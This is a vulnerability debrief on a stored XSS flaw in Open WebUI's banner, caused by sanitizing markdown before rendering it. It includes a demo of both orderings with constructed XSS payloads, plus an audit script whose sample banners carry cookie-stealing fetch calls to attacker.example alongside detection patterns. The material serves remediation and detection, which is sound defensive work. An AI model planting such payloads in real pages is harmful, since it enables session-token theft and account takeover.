PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-45665 open-webui CVE debrief

A stored cross-site scripting (XSS) vulnerability in Open WebUI prior to version 0.8.0 allows a compromised administrator account to inject malicious JavaScript into the global banner component. The root cause is an incorrect sanitization order: DOMPurify runs on the raw banner text before the marked library renders it, so markup that marked generates from markdown syntax is never inspected by the sanitizer and a crafted payload survives into the page. Because the banner renders for every user, including the Super Admin, a lower-privileged administrator can escalate to the highest-privilege account by stealing its session token. The CVSS 3.1 base score of 8.1 (High) reflects a network attack vector, low attack complexity, high privileges required, user interaction required, a scope change, and high confidentiality and integrity impact with no availability impact. The vulnerability was published on May 15, 2026 and last modified on May 19, 2026.

Vendor
open-webui
Product
Unknown
CVSS
HIGH 8.1
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-15
Original CVE updated
2026-05-19
Advisory published
2026-05-15
Advisory updated
2026-05-19

Who should care

Organizations running self-hosted Open WebUI instances with multiple administrative users, particularly those where administrator accounts may be shared or where insider threats are a concern. Security teams responsible for AI platform infrastructure and identity management administrators should prioritize this patch due to the direct path from compromised admin to full platform control.

Technical summary

The vulnerability exists in the Banner component of Open WebUI, which passes user-controlled banner content through DOMPurify first and only then through the marked markdown library. Because the sanitizer sees only the raw markdown, any HTML that marked builds from markdown syntax (a link target, an image, or similar markup) is emitted without ever being sanitized, so a crafted payload executes in the context of every user who views the banner, including the Super Admin. Modifying the banner requires administrative privileges, but a successful attack yields the highest-privilege account through session token exfiltration. The fix in version 0.8.0 corrects the order of the sanitization pipeline so the payload no longer bypasses DOMPurify.
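To make the ordering problem concrete, the following added example (written for this debrief, not Open WebUI's code and not the real libraries) uses two small stand-ins for marked and DOMPurify: a renderer that only turns markdown links and images into HTML, and a regex sanitizer that strips script elements, inline event handlers and javascript:/vbscript:/data: URLs. The payloads are constructed for illustration and are not taken from the advisory. The point it shows is that when the sanitizer runs on the raw markdown, the `<a href="javascript:...">` that the renderer later produces is never inspected; when the sanitizer runs on the rendered HTML, it is.

```javascript
// Added example: sanitize-before-render versus render-before-sanitize.
// renderMarkdown() and sanitizeHtml() are constructed stand-ins for marked and
// DOMPurify; they are deliberately tiny and are NOT adequate replacements.

// Stand-in for marked: converts ![alt](url) and [text](url) to HTML and, like
// marked, passes raw HTML through untouched. One level of nested parentheses
// is allowed inside the URL so that javascript:alert(document.cookie) parses.
function renderMarkdown(md) {
  return md
    .replace(/!\[([^\]]*)\]\(((?:[^()\s]|\([^()\s]*\))+)\)/g, '<img alt="$1" src="$2">')
    .replace(/\[([^\]]+)\]\(((?:[^()\s]|\([^()\s]*\))+)\)/g, '<a href="$2">$1</a>');
}

// Stand-in for DOMPurify: drops <script> elements, inline on* handlers, and
// href/src values whose scheme is javascript:, vbscript: or data:.
function sanitizeHtml(html) {
  return html
    .replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '')
    .replace(/\s+on\w+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi, '')
    .replace(/\b(href|src)\s*=\s*(["']?)\s*(?:javascript|vbscript|data)\s*:[^"'\s>]*\2/gi, '$1="#"');
}

// Vulnerable ordering (the pattern the advisory describes): the sanitizer
// only ever sees raw markdown, so markup the renderer creates is never checked.
function renderBannerVulnerable(md) {
  return renderMarkdown(sanitizeHtml(md));
}

// Corrected ordering: render first, then sanitize the final HTML.
function renderBannerFixed(md) {
  return sanitizeHtml(renderMarkdown(md));
}

// Constructed payloads for illustration (not from the advisory).
const LINK_PAYLOAD = '[Read the updated policy](javascript:alert(document.cookie))';
const RAW_HTML_PAYLOAD = '<img src=x onerror=alert(1)>';

// Runs both payloads through both pipelines and returns the rendered HTML.
function demo() {
  return {
    linkVulnerable: renderBannerVulnerable(LINK_PAYLOAD), // javascript: href survives
    linkFixed: renderBannerFixed(LINK_PAYLOAD),           // href neutralised to "#"
    rawVulnerable: renderBannerVulnerable(RAW_HTML_PAYLOAD), // onerror stripped either way
    rawFixed: renderBannerFixed(RAW_HTML_PAYLOAD),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, html] of Object.entries(demo())) console.log(`${name}: ${html}`);
}
```

The raw-HTML payload is caught by both orderings, which is why this class of bug is easy to miss in testing: the sanitizer works, it is simply applied to the wrong representation. A real fix applies DOMPurify to marked's output (the rendered HTML), not a regex sanitizer like the stand-in here.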

Defensive priority

high

Recommended defensive actions

  • Upgrade Open WebUI to version 0.8.0 or later to remediate the improper sanitization order in the Banner component
  • Review administrator account access controls and audit recent banner configuration changes for indicators of compromise, such as markdown links or images whose target uses a javascript:, vbscript: or data: scheme, or raw HTML carrying inline event handlers
  • Deploy a Content Security Policy (CSP) on the reverse proxy in front of Open WebUI as defense in depth; a script-src that omits 'unsafe-inline' prevents injected inline script and event handlers from executing, but roll it out in Content-Security-Policy-Report-Only mode first to confirm the application's own scripts still load
  • Monitor authentication logs for anomalous Super Admin session activity, such as sessions from unexpected source addresses or user agents, or concurrent sessions, which may indicate a stolen token
  • Where the deployment's change-management process allows it, require a second administrator to approve banner modifications before they are published
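As an added example for the banner audit recommendation above (example code written for this debrief, not Open WebUI's), the following script scans exported banner records for the indicators a reviewer would want surfaced: markdown link or image targets with a javascript:, vbscript: or data: scheme, and raw HTML carrying inline event handlers, active elements or dangerous URL attributes. The record shape ({ id, content, updated_by, updated_at }) and the sample banners are constructed assumptions; adapt the loader to however your deployment exports its banner configuration.

```javascript
// Added example: triage exported banner records for stored-XSS indicators.
// The record shape and SAMPLE_BANNERS are constructed for this example and do
// not reflect Open WebUI's actual storage format.

// Markdown link/image targets, allowing one level of nested parentheses.
const MD_TARGET_RE = /!?\[[^\]]*\]\(((?:[^()\s]|\([^()\s]*\))+)\)/g;
// Schemes that execute or smuggle content when used as a link/image target.
const DANGEROUS_SCHEME_RE = /^\s*(javascript|vbscript|data)\s*:/i;
// Raw HTML that a markdown renderer passes through unchanged.
const INLINE_HANDLER_RE = /<[^>]*\son\w+\s*=/i;
const ACTIVE_TAG_RE = /<(script|iframe|object|embed|svg|base|meta)\b/i;
const HTML_URL_RE = /\b(?:href|src|action|formaction)\s*=\s*["']?\s*(?:javascript|vbscript|data)\s*:/i;

// Returns a list of human-readable indicators found in one banner's content.
function bannerIndicators(content) {
  const found = [];
  for (const m of content.matchAll(MD_TARGET_RE)) {
    const scheme = m[1].match(DANGEROUS_SCHEME_RE);
    if (scheme) found.push(`markdown target uses ${scheme[1].toLowerCase()}: scheme`);
  }
  if (INLINE_HANDLER_RE.test(content)) found.push('inline event handler in raw HTML');
  if (ACTIVE_TAG_RE.test(content)) found.push('active HTML element in raw HTML');
  if (HTML_URL_RE.test(content)) found.push('dangerous URL scheme in raw HTML attribute');
  return found;
}

// Returns only the banners that carry at least one indicator, with the
// metadata a responder needs to pivot on (who changed it and when).
function auditBanners(banners) {
  return banners
    .map(b => ({
      id: b.id,
      updated_by: b.updated_by,
      updated_at: b.updated_at,
      indicators: bannerIndicators(b.content),
    }))
    .filter(r => r.indicators.length > 0);
}

// Constructed sample export: one benign banner and two that warrant a look.
const SAMPLE_BANNERS = [
  { id: 'b1', updated_by: 'ops-admin', updated_at: '2026-05-10T09:14:00Z',
    content: 'Maintenance Sunday 02:00 UTC. Details: [status page](https://status.example.internal)' },
  { id: 'b2', updated_by: 'contractor-admin', updated_at: '2026-05-16T23:41:00Z',
    content: '[Read the updated AI usage policy](javascript:fetch("https://attacker.example/c?"+document.cookie))' },
  { id: 'b3', updated_by: 'contractor-admin', updated_at: '2026-05-17T01:05:00Z',
    content: 'Welcome back! <img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">' },
];

function runAudit() {
  return auditBanners(SAMPLE_BANNERS);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const hit of runAudit()) {
    console.log(`${hit.id} changed by ${hit.updated_by} at ${hit.updated_at}: ${hit.indicators.join('; ')}`);
  }
}
```

This is a triage aid, not a sanitizer: browsers tolerate whitespace and control characters inside a URL scheme and HTML entities in attribute values, so treat a clean result as "nothing obvious" rather than "nothing present", and review flagged records by hand together with the account that last changed them.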

Evidence notes

The vulnerability description and CVSS vector are sourced from the NVD record. The specific technical details regarding DOMPurify and marked library ordering, as well as the Super Admin session token theft vector, are derived from the official GitHub Security Advisory. CPE criteria confirm affected versions are all versions prior to 0.8.0.

Official resources

public